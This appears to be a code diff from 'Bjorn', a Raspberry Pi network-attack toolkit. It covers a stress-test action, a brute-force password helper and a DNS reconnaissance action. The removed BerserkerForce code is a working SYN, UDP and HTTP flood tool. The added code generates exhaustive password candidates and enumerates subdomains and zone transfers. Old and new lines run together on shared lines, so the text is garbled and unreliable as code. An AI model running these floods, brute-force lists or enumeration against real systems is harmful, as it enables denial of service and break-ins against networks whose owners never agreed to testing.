"type": "slider",
"label": "Probes per second",
"min": 1,
"max": 50,
"step": 1,
"default": 20,
"help": "Max probes per second (clamped to 50 for RPi safety).",
},
}
b_examples = [
{"mode": "tcp", "duration": 30, "rate": 20},
{"mode": "mixed", "duration": 60, "rate": 40},
{"mode": "syn", "duration": 20, "rate": 10},
]
b_docs_url = "docs/actions/BerserkerForce.md"
# -------------------- Constants -----------------------------------------------
_DATA_DIR = "/home/bjorn/Bjorn/data"
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "stress")
_BASELINE_SAMPLES = 3 # TCP connect samples per port for baseline
_CONNECT_TIMEOUT_S = 2.0 # socket connect timeout
_HTTP_TIMEOUT_S = 3.0 # urllib timeout
_MAX_RATE = 50 # hard ceiling probes/s (RPi guard)
_WEB_PORTS = {80, 443, 8080, 8443, 8000, 8888, 9443, 3000, 5000}
# -------------------- Helpers -------------------------------------------------
def _tcp_connect_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Return round-trip TCP connect time in seconds, or None on failure."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout_s)
try:
t0 = time.monotonic()
err = sock.connect_ex((ip, int(port)))
elapsed = time.monotonic() - t0
return elapsed if err == 0 else None
except Exception:
return None
finally:
try:
sock.close()
except Exception:
pass
def _syn_probe_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Send a SYN via scapy and measure SYN-ACK time. Falls back to TCP connect."""
if not _HAS_SCAPY:
return _tcp_connect_time(ip, port, timeout_s)
try:
pkt = IP(dst=ip) / TCP(dport=int(port), flags="S", seq=random.randint(0, 0xFFFFFFFF))
t0 = time.monotonic()
resp = sr1(pkt, timeout=timeout_s, verbose=0)
elapsed = time.monotonic() - t0
if resp and resp.haslayer(TCP):
flags = resp[TCP].flags
# SYN-ACK (0x12) or RST (0x14) both count as "responded"
if flags in (0x12, 0x14, "SA", "RA"):
# Send RST to be polite
try:
from scapy.all import send as scapy_send # type: ignore
rst = IP(dst=ip) / TCP(dport=int(port), flags="R", seq=resp[TCP].ack)
scapy_send(rst, verbose=0)
except Exception:
pass
return elapsed
return None
except Exception:
return _tcp_connect_time(ip, port, timeout_s)
def _http_probe_time(ip: str, port: int, timeout_s: float = _HTTP_TIMEOUT_S) -> Optional[float]:
"""Send an HTTP HEAD/GET and measure response time via urllib."""
scheme = "https" if int(port) in {443, 8443, 9443} else "http"
url = f"{scheme}://{ip}:{port}/"
ctx = None
if scheme == "https":
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
try:
req = Request(url, method="HEAD", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp = urlopen(req, timeout=timeout_s, context=ctx) if ctx else urlopen(req, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp.close()
return elapsed
except Exception:
# Fallback: even a refused connection or error page counts
try:
req2 = Request(url, method="GET", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp2 = urlopen(req2, timeout=timeout_s, context=ctx) if ctx else urlopen(req2, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp2.close()
return elapsed
except URLError:
return None
except Exception:
return None
def _pick_probe_func(mode: str, port: int):
"""Return the probe function appropriate for the requested mode + port."""
if mode == "tcp":
return _tcp_connect_time
elif mode == "syn":
return _syn_probe_time
elif mode == "http":
if int(port) in _WEB_PORTS:
return _http_probe_time
return _tcp_connect_time # non-web port falls back
elif mode == "mixed":
candidates = [_tcp_connect_time]
if _HAS_SCAPY:
candidates.append(_syn_probe_time)
if int(port) in _WEB_PORTS:
candidates.append(_http_probe_time)
return random.choice(candidates)
return _tcp_connect_time
def _safe_mean(values: List[float]) -> float:
return statistics.mean(values) if values else 0.0
def _safe_stdev(values: List[float]) -> float:
return statistics.stdev(values) if len(values) >= 2 else 0.0
def _degradation_pct(baseline_mean: float, post_mean: float) -> float:
"""Percentage increase from baseline to post-stress. Positive = slower."""
if baseline_mean <= 0:
return 0.0
return round(((post_mean - baseline_mean) / baseline_mean) * 100.0, 2)
# -------------------- Main class ----------------------------------------------
class BerserkerForce: class BerserkerForce:
def __init__(self, target, ports=None, mode='mixed', rate=100, output_dir=DEFAULT_OUTPUT_DIR): """Service resilience tester -- orchestrator-compatible Bjorn action."""
self.target = target
self.ports = ports or DEFAULT_PORTS
self.mode = mode
self.rate = rate
self.output_dir = output_dir
self.active = False
self.lock = threading.Lock()
self.packet_queue = queue.Queue()
self.stats = defaultdict(int)
self.start_time = None
self.target_resources = {}
def monitor_target(self): def __init__(self, shared_data):
"""Monitor target's response times and availability.""" self.shared_data = shared_data
while self.active:
try:
for port in self.ports:
try:
start_time = time.time()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(1)
result = s.connect_ex((self.target, port))
response_time = time.time() - start_time
with self.lock:
self.target_resources[port] = {
'status': 'open' if result == 0 else 'closed',
'response_time': response_time
}
except:
with self.lock:
self.target_resources[port] = {
'status': 'error',
'response_time': None
}
time.sleep(1)
except Exception as e:
logging.error(f"Error monitoring target: {e}")
def syn_flood(self): # ------------------------------------------------------------------ #
"""Generate SYN flood packets.""" # Phase helpers #
while self.active: # ------------------------------------------------------------------ #
try:
for port in self.ports:
packet = IP(dst=self.target)/TCP(dport=port, flags="S",
seq=random.randint(0, 65535))
self.packet_queue.put(('syn', packet))
with self.lock:
self.stats['syn_packets'] += 1
time.sleep(1/self.rate)
except Exception as e:
logging.error(f"Error in SYN flood: {e}")
def udp_flood(self): def _resolve_ports(self, ip: str, port, row: Dict) -> List[int]:
"""Generate UDP flood packets.""" """Gather target ports from the port argument, row data, or DB hosts table."""
while self.active: ports: List[int] = []
try:
for port in self.ports:
data = os.urandom(1024) # Random payload
packet = IP(dst=self.target)/UDP(dport=port)/Raw(load=data)
self.packet_queue.put(('udp', packet))
with self.lock:
self.stats['udp_packets'] += 1
time.sleep(1/self.rate)
except Exception as e:
logging.error(f"Error in UDP flood: {e}")
def http_flood(self): # 1) Explicit port argument
"""Generate HTTP flood requests."""
while self.active:
try:
for port in [80, 443]:
if port in self.ports:
protocol = 'https' if port == 443 else 'http'
url = f"{protocol}://{self.target}"
# Randomize request type
request_type = random.choice(['get', 'post', 'head'])
try:
if request_type == 'get':
requests.get(url, timeout=1)
elif request_type == 'post':
requests.post(url, data=os.urandom(1024), timeout=1)
else:
requests.head(url, timeout=1)
with self.lock:
self.stats['http_requests'] += 1
except:
with self.lock:
self.stats['http_errors'] += 1
time.sleep(1/self.rate)
except Exception as e:
logging.error(f"Error in HTTP flood: {e}")
def packet_sender(self):
"""Send packets from the queue."""
while self.active:
try:
if not self.packet_queue.empty():
packet_type, packet = self.packet_queue.get()
send(packet, verbose=False)
with self.lock:
self.stats['packets_sent'] += 1
else:
time.sleep(0.1)
except Exception as e:
logging.error(f"Error sending packet: {e}")
def calculate_statistics(self):
"""Calculate and update testing statistics."""
duration = time.time() - self.start_time
stats = {
'duration': duration,
'packets_per_second': self.stats['packets_sent'] / duration,
'total_packets': self.stats['packets_sent'],
'syn_packets': self.stats['syn_packets'],
'udp_packets': self.stats['udp_packets'],
'http_requests': self.stats['http_requests'],
'http_errors': self.stats['http_errors'],
'target_resources': self.target_resources
}
return stats
def save_results(self):
"""Save test results and statistics."""
try: try:
os.makedirs(self.output_dir, exist_ok=True) p = int(port) if str(port).strip() else None
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S") if p:
ports.append(p)
results = { except Exception:
'timestamp': datetime.now().isoformat(), pass
'configuration': {
'target': self.target, # 2) Row data (Ports column, semicolon-separated)
'ports': self.ports, if not ports:
'mode': self.mode, ports_txt = str(row.get("Ports") or row.get("ports") or "")
'rate': self.rate for tok in ports_txt.replace(",", ";").split(";"):
tok = tok.strip().split("/")[0] # handle "80/tcp"
if tok.isdigit():
ports.append(int(tok))
# 3) DB lookup via MAC
if not ports:
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
if mac:
try:
rows = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if rows and rows[0].get("ports"):
for tok in rows[0]["ports"].replace(",", ";").split(";"):
tok = tok.strip().split("/")[0]
if tok.isdigit():
ports.append(int(tok))
except Exception as exc:
logger.debug(f"DB port lookup failed: {exc}")
# De-duplicate, cap at 20 ports (Pi Zero guard)
seen = set()
unique: List[int] = []
for p in ports:
if p not in seen:
seen.add(p)
unique.append(p)
return unique[:20]
def _measure_baseline(self, ip: str, ports: List[int], samples: int = _BASELINE_SAMPLES) -> Dict[int, List[float]]:
"""Phase 1 / 3: TCP connect baseline measurement (always TCP for consistency)."""
baselines: Dict[int, List[float]] = {}
for p in ports:
times: List[float] = []
for _ in range(samples):
if self.shared_data.orchestrator_should_exit:
break
rt = _tcp_connect_time(ip, p)
if rt is not None:
times.append(rt)
time.sleep(0.05) # gentle spacing
baselines[p] = times
return baselines
def _run_stress(
self,
ip: str,
ports: List[int],
mode: str,
duration_s: int,
rate: int,
progress: ProgressTracker,
stress_progress_start: int,
stress_progress_span: int,
) -> Dict[int, Dict[str, Any]]:
"""Phase 2: Controlled stress test with rate limiting."""
rate = max(1, min(rate, _MAX_RATE))
interval = 1.0 / rate
deadline = time.monotonic() + duration_s
# Per-port accumulators
results: Dict[int, Dict[str, Any]] = {}
for p in ports:
results[p] = {"sent": 0, "success": 0, "fail": 0, "times": []}
total_probes_est = rate * duration_s
probes_done = 0
port_idx = 0
while time.monotonic() < deadline:
if self.shared_data.orchestrator_should_exit:
break
p = ports[port_idx % len(ports)]
port_idx += 1
probe_fn = _pick_probe_func(mode, p)
rt = probe_fn(ip, p)
results[p]["sent"] += 1
if rt is not None:
results[p]["success"] += 1
results[p]["times"].append(rt)
else:
results[p]["fail"] += 1
probes_done += 1
# Update progress (map probes_done onto the stress progress range)
if total_probes_est > 0:
frac = min(1.0, probes_done / total_probes_est)
pct = stress_progress_start + int(frac * stress_progress_span)
self.shared_data.bjorn_progress = f"{min(pct, stress_progress_start + stress_progress_span)}%"
# Rate limit
time.sleep(interval)
return results
def _analyze(
self,
pre_baseline: Dict[int, List[float]],
post_baseline: Dict[int, List[float]],
stress_results: Dict[int, Dict[str, Any]],
ports: List[int],
) -> Dict[str, Any]:
"""Phase 4: Build the analysis report dict."""
per_port: List[Dict[str, Any]] = []
for p in ports:
pre = pre_baseline.get(p, [])
post = post_baseline.get(p, [])
sr = stress_results.get(p, {"sent": 0, "success": 0, "fail": 0, "times": []})
pre_mean = _safe_mean(pre)
post_mean = _safe_mean(post)
degradation = _degradation_pct(pre_mean, post_mean)
per_port.append({
"port": p,
"pre_baseline": {
"samples": len(pre),
"mean_s": round(pre_mean, 6),
"stdev_s": round(_safe_stdev(pre), 6),
"values_s": [round(v, 6) for v in pre],
}, },
'statistics': self.calculate_statistics() "stress": {
} "probes_sent": sr["sent"],
"probes_ok": sr["success"],
output_file = os.path.join(self.output_dir, f"stress_test_{timestamp}.json") "probes_fail": sr["fail"],
with open(output_file, 'w') as f: "mean_rt_s": round(_safe_mean(sr["times"]), 6),
json.dump(results, f, indent=4) "stdev_rt_s": round(_safe_stdev(sr["times"]), 6),
"min_rt_s": round(min(sr["times"]), 6) if sr["times"] else None,
logging.info(f"Results saved to {output_file}") "max_rt_s": round(max(sr["times"]), 6) if sr["times"] else None,
},
except Exception as e: "post_baseline": {
logging.error(f"Failed to save results: {e}") "samples": len(post),
"mean_s": round(post_mean, 6),
"stdev_s": round(_safe_stdev(post), 6),
"values_s": [round(v, 6) for v in post],
},
"degradation_pct": degradation,
})
def start(self): # Overall summary
"""Start stress testing.""" total_sent = sum(sr.get("sent", 0) for sr in stress_results.values())
self.active = True total_ok = sum(sr.get("success", 0) for sr in stress_results.values())
self.start_time = time.time() total_fail = sum(sr.get("fail", 0) for sr in stress_results.values())
avg_degradation = (
threads = [] round(statistics.mean([pp["degradation_pct"] for pp in per_port]), 2)
if per_port else 0.0
# Start monitoring thread )
monitor_thread = threading.Thread(target=self.monitor_target)
monitor_thread.start()
threads.append(monitor_thread)
# Start sender thread
sender_thread = threading.Thread(target=self.packet_sender)
sender_thread.start()
threads.append(sender_thread)
# Start attack threads based on mode
if self.mode in ['syn', 'mixed']:
syn_thread = threading.Thread(target=self.syn_flood)
syn_thread.start()
threads.append(syn_thread)
if self.mode in ['udp', 'mixed']:
udp_thread = threading.Thread(target=self.udp_flood)
udp_thread.start()
threads.append(udp_thread)
if self.mode in ['http', 'mixed']:
http_thread = threading.Thread(target=self.http_flood)
http_thread.start()
threads.append(http_thread)
return threads
def stop(self): return {
"""Stop stress testing.""" "summary": {
self.active = False "ports_tested": len(ports),
self.save_results() "total_probes_sent": total_sent,
"total_probes_ok": total_ok,
def save_settings(target, ports, mode, rate, output_dir): "total_probes_fail": total_fail,
"""Save settings to JSON file.""" "avg_degradation_pct": avg_degradation,
try: },
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True) "per_port": per_port,
settings = {
"target": target,
"ports": ports,
"mode": mode,
"rate": rate,
"output_dir": output_dir
} }
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings(): def _save_report(self, ip: str, mode: str, duration_s: int, rate: int, analysis: Dict) -> str:
"""Load settings from JSON file.""" """Write the JSON report and return the file path."""
if os.path.exists(SETTINGS_FILE):
try: try:
with open(SETTINGS_FILE, 'r') as f: os.makedirs(OUTPUT_DIR, exist_ok=True)
return json.load(f) except Exception as exc:
except Exception as e: logger.warning(f"Could not create output dir {OUTPUT_DIR}: {exc}")
logging.error(f"Failed to load settings: {e}")
return {}
def main(): ts = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H-%M-%S")
parser = argparse.ArgumentParser(description="Resource exhaustion testing tool") safe_ip = ip.replace(":", "_").replace(".", "_")
parser.add_argument("-t", "--target", help="Target IP or hostname") filename = f"{safe_ip}_{ts}.json"
parser.add_argument("-p", "--ports", help="Ports to test (comma-separated)") filepath = os.path.join(OUTPUT_DIR, filename)
parser.add_argument("-m", "--mode", choices=['syn', 'udp', 'http', 'mixed'],
default='mixed', help="Test mode") report = {
parser.add_argument("-r", "--rate", type=int, default=100, help="Packets per second") "tool": "berserker_force",
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory") "version": b_version,
"timestamp": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"),
"target": ip,
"config": {
"mode": mode,
"duration_s": duration_s,
"rate_per_s": rate,
"scapy_available": _HAS_SCAPY,
},
"analysis": analysis,
}
try:
with open(filepath, "w") as fh:
json.dump(report, fh, indent=2, default=str)
logger.info(f"Report saved to {filepath}")
except Exception as exc:
logger.error(f"Failed to write report {filepath}: {exc}")
return filepath
# ------------------------------------------------------------------ #
# Orchestrator entry point #
# ------------------------------------------------------------------ #
def execute(self, ip: str, port, row: Dict, status_key: str) -> str:
"""
Main entry point called by the Bjorn orchestrator.
Returns 'success', 'failed', or 'interrupted'.
"""
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# --- Identity cache from row -----------------------------------------
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
# --- Resolve target ports --------------------------------------------
ports = self._resolve_ports(ip, port, row)
if not ports:
logger.warning(f"BerserkerForce: no ports resolved for {ip}")
return "failed"
# --- Read runtime config from shared_data ----------------------------
mode = str(getattr(self.shared_data, "berserker_mode", "tcp") or "tcp").lower()
if mode not in ("tcp", "syn", "http", "mixed"):
mode = "tcp"
duration_s = max(10, min(int(getattr(self.shared_data, "berserker_duration", 30) or 30), 120))
rate = max(1, min(int(getattr(self.shared_data, "berserker_rate", 20) or 20), _MAX_RATE))
# --- EPD / UI updates ------------------------------------------------
self.shared_data.bjorn_orch_status = "berserker_force"
self.shared_data.bjorn_status_text2 = f"{ip} ({len(ports)} ports)"
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports)), "mode": mode}
# Total units for progress: baseline(15) + stress(70) + post-baseline(10) + analysis(5)
self.shared_data.bjorn_progress = "0%"
try:
# ============================================================== #
# Phase 1: Pre-stress baseline (0 - 15%) #
# ============================================================== #
logger.info(f"Phase 1/4: pre-stress baseline for {ip} on {len(ports)} ports")
self.shared_data.comment_params = {"ip": ip, "phase": "baseline"}
self.shared_data.log_milestone(b_class, "BaselineStart", f"Measuring {len(ports)} ports")
pre_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "15%"
# ============================================================== #
# Phase 2: Stress test (15 - 85%) #
# ============================================================== #
logger.info(f"Phase 2/4: stress test ({mode}, {duration_s}s, {rate} req/s)")
self.shared_data.comment_params = {
"ip": ip,
"phase": "stress",
"mode": mode,
"rate": str(rate),
}
self.shared_data.log_milestone(b_class, "StressActive", f"Mode: {mode} | Duration: {duration_s}s")
# Build a dummy ProgressTracker just for internal bookkeeping;
# we do fine-grained progress updates ourselves.
progress = ProgressTracker(self.shared_data, 100)
stress_results = self._run_stress(
ip=ip,
ports=ports,
mode=mode,
duration_s=duration_s,
rate=rate,
progress=progress,
stress_progress_start=15,
stress_progress_span=70,
)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "85%"
# ============================================================== #
# Phase 3: Post-stress baseline (85 - 95%) #
# ============================================================== #
logger.info(f"Phase 3/4: post-stress baseline for {ip}")
self.shared_data.comment_params = {"ip": ip, "phase": "post-baseline"}
self.shared_data.log_milestone(b_class, "RecoveryMeasure", f"Checking {ip} after stress")
post_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "95%"
# ============================================================== #
# Phase 4: Analysis & report (95 - 100%) #
# ============================================================== #
logger.info("Phase 4/4: analyzing results")
self.shared_data.comment_params = {"ip": ip, "phase": "analysis"}
analysis = self._analyze(pre_baseline, post_baseline, stress_results, ports)
report_path = self._save_report(ip, mode, duration_s, rate, analysis)
self.shared_data.bjorn_progress = "100%"
# Final UI update
avg_deg = analysis.get("summary", {}).get("avg_degradation_pct", 0.0)
self.shared_data.log_milestone(b_class, "Complete", f"Avg Degradation: {avg_deg}% | Report: {os.path.basename(report_path)}")
return "success"
except Exception as exc:
logger.error(f"BerserkerForce failed for {ip}: {exc}", exc_info=True)
return "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug / manual) ---------------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="BerserkerForce (service resilience tester)")
parser.add_argument("--ip", required=True, help="Target IP address")
parser.add_argument("--port", default="", help="Specific port (optional; uses row/DB otherwise)")
parser.add_argument("--mode", default="tcp", choices=["tcp", "syn", "http", "mixed"])
parser.add_argument("--duration", type=int, default=30, help="Stress duration in seconds")
parser.add_argument("--rate", type=int, default=20, help="Probes per second (max 50)")
args = parser.parse_args() args = parser.parse_args()
settings = load_settings() sd = SharedData()
target = args.target or settings.get("target") # Push CLI args into shared_data so the action reads them
ports = [int(p) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS) sd.berserker_mode = args.mode
mode = args.mode or settings.get("mode") sd.berserker_duration = args.duration
rate = args.rate or settings.get("rate") sd.berserker_rate = args.rate
output_dir = args.output or settings.get("output_dir")
if not target: act = BerserkerForce(sd)
logging.error("Target is required. Use -t or save it in settings")
return
save_settings(target, ports, mode, rate, output_dir) row = {
"MAC Address": getattr(sd, "get_raspberry_mac", lambda: "__GLOBAL__")() or "__GLOBAL__",
"Hostname": "",
"Ports": args.port,
}
berserker = BerserkerForce( result = act.execute(args.ip, args.port, row, "berserker_force")
target=target, print(f"Result: {result}")
ports=ports,
mode=mode,
rate=rate,
output_dir=output_dir
)
try:
threads = berserker.start()
logging.info(f"Stress testing started against {target}")
while True:
time.sleep(1)
except KeyboardInterrupt:
logging.info("Stopping stress test...")
berserker.stop()
for thread in threads:
thread.join()
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,114 @@
import itertools
import threading
import time
from typing import Iterable, List, Sequence
def _unique_keep_order(items: Iterable[str]) -> List[str]:
seen = set()
out: List[str] = []
for raw in items:
s = str(raw or "")
if s in seen:
continue
seen.add(s)
out.append(s)
return out
def build_exhaustive_passwords(shared_data, existing_passwords: Sequence[str]) -> List[str]:
"""
Build optional exhaustive password candidates from runtime config.
Returns a bounded list (max_candidates) to stay Pi Zero friendly.
"""
if not bool(getattr(shared_data, "bruteforce_exhaustive_enabled", False)):
return []
min_len = int(getattr(shared_data, "bruteforce_exhaustive_min_length", 1))
max_len = int(getattr(shared_data, "bruteforce_exhaustive_max_length", 4))
max_candidates = int(getattr(shared_data, "bruteforce_exhaustive_max_candidates", 2000))
require_mix = bool(getattr(shared_data, "bruteforce_exhaustive_require_mix", False))
min_len = max(1, min_len)
max_len = max(min_len, min(max_len, 8))
max_candidates = max(0, min(max_candidates, 200000))
if max_candidates == 0:
return []
use_lower = bool(getattr(shared_data, "bruteforce_exhaustive_lowercase", True))
use_upper = bool(getattr(shared_data, "bruteforce_exhaustive_uppercase", True))
use_digits = bool(getattr(shared_data, "bruteforce_exhaustive_digits", True))
use_symbols = bool(getattr(shared_data, "bruteforce_exhaustive_symbols", False))
symbols = str(getattr(shared_data, "bruteforce_exhaustive_symbols_chars", "!@#$%^&*"))
groups: List[str] = []
if use_lower:
groups.append("abcdefghijklmnopqrstuvwxyz")
if use_upper:
groups.append("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
if use_digits:
groups.append("0123456789")
if use_symbols and symbols:
groups.append(symbols)
if not groups:
return []
charset = "".join(groups)
existing = set(str(x) for x in (existing_passwords or []))
generated: List[str] = []
for ln in range(min_len, max_len + 1):
for tup in itertools.product(charset, repeat=ln):
pwd = "".join(tup)
if pwd in existing:
continue
if require_mix and len(groups) > 1:
if not all(any(ch in grp for ch in pwd) for grp in groups):
continue
generated.append(pwd)
if len(generated) >= max_candidates:
return generated
return generated
class ProgressTracker:
"""
Thread-safe progress helper for bruteforce actions.
"""
def __init__(self, shared_data, total_attempts: int):
self.shared_data = shared_data
self.total = max(1, int(total_attempts))
self.attempted = 0
self._lock = threading.Lock()
self._last_emit = 0.0
self.shared_data.bjorn_progress = "0%"
def advance(self, step: int = 1):
now = time.time()
with self._lock:
self.attempted += max(1, int(step))
attempted = self.attempted
total = self.total
if now - self._last_emit < 0.2 and attempted < total:
return
self._last_emit = now
pct = min(100, int((attempted * 100) / total))
self.shared_data.bjorn_progress = f"{pct}%"
def set_complete(self):
self.shared_data.bjorn_progress = "100%"
def clear(self):
self.shared_data.bjorn_progress = ""
def merged_password_plan(shared_data, dictionary_passwords: Sequence[str]) -> tuple[list[str], list[str]]:
"""
Returns (dictionary_passwords, fallback_passwords) with uniqueness preserved.
Fallback list is empty unless exhaustive mode is enabled.
"""
dictionary = _unique_keep_order(dictionary_passwords or [])
fallback = build_exhaustive_passwords(shared_data, dictionary)
return dictionary, _unique_keep_order(fallback)

View File

@@ -1,175 +1,837 @@
# DNS Pillager for reconnaissance and enumeration of DNS infrastructure. """
# Saves settings in `/home/bjorn/.settings_bjorn/dns_pillager_settings.json`. dns_pillager.py - DNS reconnaissance and enumeration action for Bjorn.
# Automatically loads saved settings if arguments are not provided.
# -d, --domain Target domain for enumeration (overrides saved value). Performs comprehensive DNS intelligence gathering on discovered hosts:
# -w, --wordlist Path to subdomain wordlist (default: built-in list). - Reverse DNS lookup on target IP
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/dns). - Full DNS record enumeration (A, AAAA, MX, NS, TXT, CNAME, SOA, SRV, PTR)
# -t, --threads Number of threads for scanning (default: 10). - Zone transfer (AXFR) attempts against discovered nameservers
# -r, --recursive Enable recursive enumeration of discovered subdomains. - Subdomain brute-force enumeration with threading
SQL mode:
- Targets provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Discovered hostnames are written back to DB hosts table
- Results saved as JSON in data/output/dns/
- Action status recorded in DB.action_results (via DNSPillager.execute)
"""
import os import os
import json import json
import dns.resolver import socket
import threading
import argparse
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime
import logging import logging
import threading
import time
import datetime
from typing import Dict, List, Optional, Tuple, Set
from concurrent.futures import ThreadPoolExecutor, as_completed
# Configure logging from shared import SharedData
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') from logger import Logger
# Configure the logger
logger = Logger(name="dns_pillager.py", level=logging.DEBUG)
b_class = "DNSPillager" # ---------------------------------------------------------------------------
b_module = "dns_pillager" # Graceful import for dnspython (socket fallback if unavailable)
b_enabled = 0 # ---------------------------------------------------------------------------
_HAS_DNSPYTHON = False
try:
import dns.resolver
import dns.zone
import dns.query
import dns.reversename
import dns.rdatatype
import dns.exception
_HAS_DNSPYTHON = True
logger.info("dnspython library loaded successfully.")
except ImportError:
logger.warning(
"dnspython not installed. DNS operations will use socket fallback "
"(limited functionality). Install with: pip install dnspython"
)
# ---------------------------------------------------------------------------
# Action metadata (AST-friendly, consumed by sync_actions / orchestrator)
# ---------------------------------------------------------------------------
b_class = "DNSPillager"
b_module = "dns_pillager"
b_status = "dns_pillager"
b_port = 53
b_service = '["dns"]'
b_trigger = 'on_any:["on_host_alive","on_new_port:53"]'
b_parent = None
b_action = "normal"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 20
b_cooldown = 7200
b_rate_limit = "5/86400"
b_timeout = 300
b_max_retries = 2
b_stealth_level = 7
b_risk_level = "low"
b_enabled = 1
b_tags = ["dns", "recon", "enumeration"]
b_category = "recon"
b_name = "DNS Pillager"
b_description = (
"Comprehensive DNS reconnaissance and enumeration action. "
"Performs reverse DNS, record enumeration (A/AAAA/MX/NS/TXT/CNAME/SOA/SRV/PTR), "
"zone transfer attempts, and subdomain brute-force discovery. "
"Requires: dnspython (pip install dnspython) for full functionality; "
"falls back to socket-based lookups if unavailable."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "DNSPillager.png"
b_args = {
"threads": {
"type": "number",
"label": "Subdomain Threads",
"min": 1,
"max": 50,
"step": 1,
"default": 10,
"help": "Number of threads for subdomain brute-force enumeration."
},
"wordlist": {
"type": "text",
"label": "Subdomain Wordlist",
"default": "",
"placeholder": "/path/to/wordlist.txt",
"help": "Path to a custom subdomain wordlist file. Leave empty for built-in list (~100 entries)."
},
"timeout": {
"type": "number",
"label": "DNS Query Timeout (s)",
"min": 1,
"max": 30,
"step": 1,
"default": 3,
"help": "Timeout in seconds for individual DNS queries."
},
"enable_axfr": {
"type": "checkbox",
"label": "Attempt Zone Transfer (AXFR)",
"default": True,
"help": "Try AXFR zone transfers against discovered nameservers."
},
"enable_subdomains": {
"type": "checkbox",
"label": "Enable Subdomain Brute-Force",
"default": True,
"help": "Enumerate subdomains using wordlist."
},
}
b_examples = [
{"threads": 10, "wordlist": "", "timeout": 3, "enable_axfr": True, "enable_subdomains": True},
{"threads": 5, "wordlist": "/home/bjorn/wordlists/subdomains.txt", "timeout": 5, "enable_axfr": False, "enable_subdomains": True},
]
b_docs_url = "docs/actions/DNSPillager.md"
# ---------------------------------------------------------------------------
# Data directories
# ---------------------------------------------------------------------------
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "dns")
# ---------------------------------------------------------------------------
# Built-in subdomain wordlist (~100 common entries)
# ---------------------------------------------------------------------------
BUILTIN_SUBDOMAINS = [
"www", "mail", "ftp", "localhost", "webmail", "smtp", "pop", "ns1", "ns2",
"ns3", "ns4", "dns", "dns1", "dns2", "mx", "mx1", "mx2", "imap", "pop3",
"blog", "dev", "staging", "test", "testing", "beta", "alpha", "demo",
"admin", "administrator", "panel", "cpanel", "webmin", "portal",
"api", "api2", "api3", "gateway", "gw", "proxy", "cdn", "media",
"static", "assets", "img", "images", "files", "download", "upload",
"vpn", "remote", "ssh", "rdp", "citrix", "owa", "exchange",
"db", "database", "mysql", "postgres", "sql", "mongodb", "redis", "elastic",
"shop", "store", "app", "apps", "mobile", "m",
"intranet", "extranet", "internal", "external", "private", "public",
"cloud", "aws", "azure", "gcp", "s3", "storage",
"git", "gitlab", "github", "svn", "repo", "ci", "cd", "jenkins", "build",
"monitor", "monitoring", "grafana", "prometheus", "kibana", "nagios", "zabbix",
"log", "logs", "syslog", "elk",
"chat", "slack", "teams", "jira", "confluence", "wiki",
"backup", "backups", "bak", "archive",
"secure", "security", "sso", "auth", "login", "oauth",
"docs", "doc", "help", "support", "kb", "status",
"calendar", "crm", "erp", "hr",
"web", "web1", "web2", "server", "server1", "server2",
"host", "node", "worker", "master",
]
# DNS record types to enumerate
DNS_RECORD_TYPES = ["A", "AAAA", "MX", "NS", "TXT", "CNAME", "SOA", "SRV", "PTR"]
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/dns"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "dns_pillager_settings.json")
DEFAULT_RECORD_TYPES = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'CNAME', 'SOA']
class DNSPillager: class DNSPillager:
def __init__(self, domain, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, recursive=False): """
